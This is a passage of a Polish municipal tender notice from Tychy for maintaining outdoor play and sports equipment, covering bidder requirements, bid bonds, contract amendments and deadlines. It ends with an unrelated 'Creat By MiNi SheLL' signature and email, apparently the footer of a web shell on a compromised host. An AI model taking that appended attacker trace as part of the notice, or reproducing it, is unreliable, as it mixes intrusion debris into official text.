usługę utrzymania lub<br/>usługę utrzymania wraz z naprawami plenerowych urządzeń sportowych lub rekreacyjnych o wartości min. 15 000,00 zł brutto –<br/>usługa ta powinna być realizowana w sposób ciągły przez okres nie krótszy niż 6 miesięcy w ramach jednej umowy (dotyczy 1.2.2.1.Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach<br/>określonych w art. 118 Ustawy, warunek o którym wyżej mowa , musi zostać spełniony w całości przez Wykonawcę<br/>(jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się<br/>Wykonawca –<br/>brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>1.2.2.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy - wzór oświadczenia stanowi załącznik nr 9 do SWZ.<br/>1.2.2.Zamawiający wymaga, aby Wykonawca dysponował co najmniej (dotyczy Zadania nr 1 i Zadania nr 2):<br/>1.2.2.1. 1 osobą dla każdego Zadania (lub 1 osobą w przypadku złożenia oferty na oba Zadania) do pełnienia nadzoru nad<br/>pracami związanymi z utrzymaniem i konserwacją terenów zabawowych, sportowych oraz rekreacyjnych oraz<br/>odpowiedzialną za przeprowadzenie kontroli pięcioletniej z uprawnieniami budowlanymi w specjalności konstrukcyjno –<br/>budowlanej.<br/>1.2.2.2. Osoba, o której mowa powyżej musi posługiwać się językiem polskim lub w przypadku braku znajomości języka<br/>polskiego, Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumacza języka polskiego<br/>w celu stałego tłumaczenia w kontaktach pomiędzy Zamawiającym,<br/>a personelem Wykonawcy.<br/>1.2.2.3. Wymienioną powyżej w pkt. 1.2.2.1. osobę ze strony Wykonawcy należy traktować jako minimalne wymaganie<br/>Zamawiającego i nie wyczerpuje on całości personelu niezbędnego dla rzetelnego wypełnienia obowiązków Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta<br/>zostanie najwyżej oceniona, nie będzie wezwany do złożenia podmiotowych środków dowodowych w celu wykazania braku podstaw<br/>wykluczenia z postępowania, o których mowa w Dziale V pkt 2 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu<br/>określonych przez Zamawiającego w Dziale V pkt 3 SWZ, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>1.1. W zakresie sytuacji ekonomicznej lub finansowej:<br/>1.1.1. dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (dotyczy Zadania nr 1 i<br/>Zadania nr 2),<br/>1.2.W zakresie zdolności technicznej lub zawodowej:<br/>1.2.1. wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy usługi te zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. Wzór<br/>wykazu będzie przekazany przez Zamawiającego wraz z wezwaniem (dot. Zadnia nr 1 i Zadania nr 2).<br/>1.2.1.1. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>1.2.1.1.1. Okres wskazany powyżej w pkt. 1.2.1.1., liczy się wstecz od dnia,<br/>w którym upływa termin składania ofert.<br/>1.2.2.wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami. Wzór wykazu będzie przekazany przez Zamawiającego wraz z wezwaniem (dot.<br/>Zadnia nr 1 i Zadania nr 2).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca przystępujący do niniejszego postępowania zobowiązany jest wnieść wadium na czas związania ofertą o wartości:<br/>1.1. 2 000,00 zł (słownie: dwa tysiące złotych) – dla Zadania nr 1,<br/>1.2. 700,00 zł (słownie: siedemset złotych) – dla Zadania nr 2,<br/>1.3. 2 700,00 zł (słownie: dwa tysiące siedemset złotych) – w przypadku złożenia oferty na obydwa Zadania.<br/>1.3.1. Jeżeli wysokość wniesionego wadium w zakresie obydwu części będzie niższa niż kwota, wskazana powyżej w pkt 1.3, Zamawiający uzna, że wadium dla obydwu części nie zostało wniesione w wymaganej wysokości oraz będzie miało zastosowanie odrzucenie oferty na podstawie art. 226 ust. 1 pkt 14) Pzp.<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>3.Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>3.1.Pieniądzu,<br/>3.2.Gwarancjach bankowych,<br/>3.3.Gwarancjach ubezpieczeniowych,<br/>3.4.Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. W przypadku wniesienia wadium w formach określonych powyżej w pkt 3.2.- 3.4., dokument winien być wystawiony na<br/>Gminę Miasta Tychy – Tyski Zakład Usług Komunalnych w Tychach, ul. Budowlanych 43, 43-100 Tychy.<br/>5.Wadium w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego: 831240 2975 1111 0010 6677<br/>5534 PEKAO Bank Pekao S.A. Kod Swift (wymagany przy przelewach międzynarodowych): PKOP PL PW<br/>6.Wnosząc wadium Wykonawca winien powołać się na nazwę niniejszego postępowania oraz nr nadany postępowaniu<br/>przez Zamawiającego (DO.261.26.2022).<br/>7.Wadium w formie niepieniężnej:<br/>7.1.Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.2.Treść dokumentu wadium winna zawierać nazwę niniejszego postępowania oraz nr nadany postępowaniu przez Zamawiającego (DO.261.26.2022).<br/>7.3.Udzielona gwarancja:<br/>7.3.1.musi być gwarancją samoistną, nieodwołalną, bezwarunkową i płatną na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów,<br/>7.3.2.musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Ustawie,<br/>7.3.3.z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty Zamawiającemu całej kwoty wadium,<br/>7.3.4.treść gwarancji nie może zawierać klauzuli zwalniającej gwaranta od odpowiedzialności wskutek zwrotu dokumentu<br/>gwarancji,<br/>7.3.5.w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga,<br/>aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (tj. zobowiązanych z tytułu<br/>poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum).<br/>8.Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 Ustawy, warunek o którym mowa<br/>w pkt. 3.1. w Dziale V SWZ, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca.<br/>2. Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 Ustawy, warunek o którym mowa w pkt 3.2. w Dziale V SWZ, musi zostać spełniony w całości przez Wykonawcę<br/>(jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia.<br/>2.1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - wzór oświadczenia stanowi załącznik nr 9 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 15 projektowanych postanowień umownych (dla Zadania nr 1 i 2):<br/>1. Zamawiający przewiduje możliwość dokonywania zmian postanowień umowy, także w stosunku do treści oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:<br/>1) zmiana terminu wykonania przedmiotu umowy określonego w § 1 ust. 5 w razie wystąpienia siły wyższej lub losowego<br/>zdarzenia zewnętrznego, którego skutków nie da się przewidzieć, np.: intensywne opady atmosferyczne, huragan, a także w<br/>razie konieczności podjęcia działań zmierzających do ograniczenia skutków wystąpienia siły wyższej;<br/>2) zmiany przepisów prawa obowiązujących po dacie zawarcia umowy, wywołujących potrzebę zmian umowy wraz ze<br/>skutkami wprowadzenia takich zmian - w takim przypadku zmianie mogą ulec wyłącznie zapisy umowy, do których odnoszą<br/>się zmiany przepisów prawa;<br/>3) wystąpią działania osób trzecich, które uniemożliwiają wykonanie zadań w terminie lub inne zdarzenia mogące<br/>negatywnie wpłynąć na termin i jakość przedmiotu zamówienia,<br/>4) nastąpi zmiana obowiązującej stawki VAT,<br/>5) ograniczenia lub rozszerzenia przez Zamawiającego zakresu przedmiotu zamówienia z przyczyn, których nie można było<br/>przewidzieć w chwili zawierania umowy,<br/>6) zaistniały przyczyny niezależne od działania Stron, których przy zachowaniu wszelkich należytych środków nie można<br/>uniknąć ani im zapobiec,<br/>2. Warunkiem wprowadzenia do zawartej umowy zmian, o których mowa w ust. 1 będzie potwierdzenie powstałych<br/>okoliczności w formie opisowej i właściwie umotywowanej, zaakceptowanej przez każdą ze Stron umowy.<br/>3. Zmiany określone w ust. 1 wymagają sporządzenia do umowy aneksu pod rygorem nieważności.<br/>4. W przypadku zmian przepisów bezwzględnie obowiązujących, na które umowa się powołuje, a w szczególności<br/>przepisów dotyczących stawki podatku od towarów i usług, postanowienia niniejszej umowy ulegają automatycznie zmianie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej: https://tzuktychy. logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-29 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835, z późn. zm.). Do Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 wspomnianej ustawy.<br/><br/>2. Przedmiot zamówienia winien zostać wykonany w terminie (dot. Zadania nr 1 i 2):<br/>2.1 12 miesięcy od dnia jej podpisania, nie wcześniej jednak niż od dnia 1 stycznia 2023 r. do dnia 31 grudnia 2023 r.<br/>2.2. Wykonawca zobowiązuje się do wykonywania przyjętych na siebie obowiązków umownych od dnia zawarcia umowy jednak nie wcześniej niż od dnia 2 stycznia 2023r. do dnia 31 grudnia 2023 r.<br/><br/>3. Na ofertę składa się:<br/>3.1. Formularz oferty - wzór stanowi załącznik nr 1A do SWZ (dla Zadania nr 1), załącznik nr 1B do SWZ (dla Zadania nr 2),<br/>3.2. Kosztorys ofertowy zawierający wykaz prac związanych z wykonaniem zakresu rzeczowego - wzór stanowi załącznik nr 3A do SWZ (dla Zadania nr 1), załącznik nr 3B (dla Zadania nr 2),<br/>3.3. Dowód wniesienia wadium w formie innej niż pieniężna (jeżeli dotyczy),<br/>3.4. Oświadczenie (oświadczenia) z art. 125 ust. 1 Pzp - wzór stanowi załącznik nr 7 lub 8 do SWZ,<br/>3.5. Zobowiązanie innego podmiotu (jeżeli dotyczy),<br/>3.6.Pełnomocnictwo (jeżeli dotyczy),<br/>3.7.Oświadczenie Wykonawcy wspólnie ubiegającego się o zamówienie na podstawie art. 117 ust. 4 Pzp - wzór stanowi załącznik nr 9 do SWZ (jeżeli dotyczy).

Creat By MiNi SheLL
Email: jattceo@gmail.com